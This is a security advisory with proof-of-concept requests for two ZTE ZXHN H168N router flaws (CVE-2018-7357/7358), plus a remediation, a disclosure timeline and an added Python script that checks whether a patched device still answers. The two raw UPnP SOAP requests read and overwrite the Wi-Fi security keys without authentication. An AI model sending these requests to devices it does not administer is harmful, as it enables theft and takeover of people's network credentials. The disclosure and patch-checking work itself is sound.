
[*] POC: (CVE-2018-7357 and CVE-2018-7358)

Disclaimer: [This POC is for Educational Purposes, I would Not be responsible for any misuse of the information mentioned in this blog post]

[+] Unauthenticated

[+] Author: Usman Saeed (usman [at] xc0re.net)

[+] Protocol: UPnP

[+] Affected Hardware/Software:

Model name: ZXHN H168N v2.2
Build Timestamp: 20171127193202
Software Version: V2.2.0_PK1.2T5

[+] Findings:

1. Unauthenticated access to WLAN password:

POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 288
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"></u:GetSecurityKeys></s:Body></s:Envelope>

2. Unauthenticated WLAN passphrase change:

POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 496
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>

[*] Solution:

UPnP should not expose excessive services; if that fix is not possible, UPnP should be disabled on the affected devices.
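Added example (not the advisory author's code) for checking, after the patch is applied, that the WLANConfiguration control URL from the findings above no longer answers an unauthenticated GetSecurityKeys call. It assumes the device's reply follows the UPnP <action>Response naming convention and carries the same field names the advisory's SetSecurityKeys request uses; the verdict never includes key material.

```python
import http.client
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SERVICE = "urn:dslforum-org:service:WLANConfiguration:1"
CONTROL_PATH = "/control/igd/wlanc_1_1"   # control URL from the advisory
UPNP_PORT = 52869                         # UPnP port from the advisory
# Assumption: the reply reuses the field names seen in SetSecurityKeys.
KEY_FIELDS = ("NewPreSharedKey", "NewKeyPassphrase",
              "NewWEPKey0", "NewWEPKey1", "NewWEPKey2", "NewWEPKey3")

def build_request(host, action="GetSecurityKeys"):
    """Headers and body in the shape the advisory shows (no key values)."""
    body = ('<?xml version="1.0" encoding="utf-8"?>'
            f'<s:Envelope xmlns:s="{SOAP_NS}" '
            f's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
            f'<s:Body><u:{action} xmlns:u="{SERVICE}"></u:{action}></s:Body></s:Envelope>')
    headers = {"Host": f"{host}:{UPNP_PORT}", "Connection": "close",
               "Content-Type": 'text/xml; charset="utf-8"',
               "SOAPACTION": f'"{SERVICE}#{action}"',
               "Content-Length": str(len(body))}
    return headers, body

def classify_response(status, body):
    """'exposed' if key fields came back filled, 'rejected' if the device
    refused (HTTP error or SOAP Fault), 'unknown' otherwise."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return "rejected" if status >= 400 else "unknown"
    if root.find(f".//{{{SOAP_NS}}}Fault") is not None:
        return "rejected"
    # Assumption: response element is named <action>Response (UPnP convention).
    resp = root.find(f".//{{{SERVICE}}}GetSecurityKeysResponse")
    if resp is None:
        return "rejected" if status >= 400 else "unknown"
    if any((resp.findtext(f) or "").strip() for f in KEY_FIELDS):
        return "exposed"
    return "unknown"

def probe(host, timeout=5):
    # Hypothetical helper: sends the call and returns only the verdict string.
    headers, body = build_request(host)
    conn = http.client.HTTPConnection(host, UPNP_PORT, timeout=timeout)
    conn.request("POST", CONTROL_PATH, body=body, headers=headers)
    resp = conn.getresponse()
    verdict = classify_response(resp.status, resp.read().decode("utf-8", "replace"))
    conn.close()
    return verdict
```

Run probe() against a device you administer; a patched unit should come back "rejected", and "exposed" means the update did not close the finding.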

[*] Note:

There are other services that should not be published over UPnP which are not mentioned in this blog post, as the solution is the same.

[+] Responsible Disclosure:

Vulnerabilities identified – 20 August, 2018
Reported to ZTE – 28 August, 2018
ZTE official statement – 17 September 2018
ZTE patched the vulnerability – 12 November 2018
The operator pushed the update – 12 November 2018
CVE published – Later
Public disclosure – 12 November 2018

Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522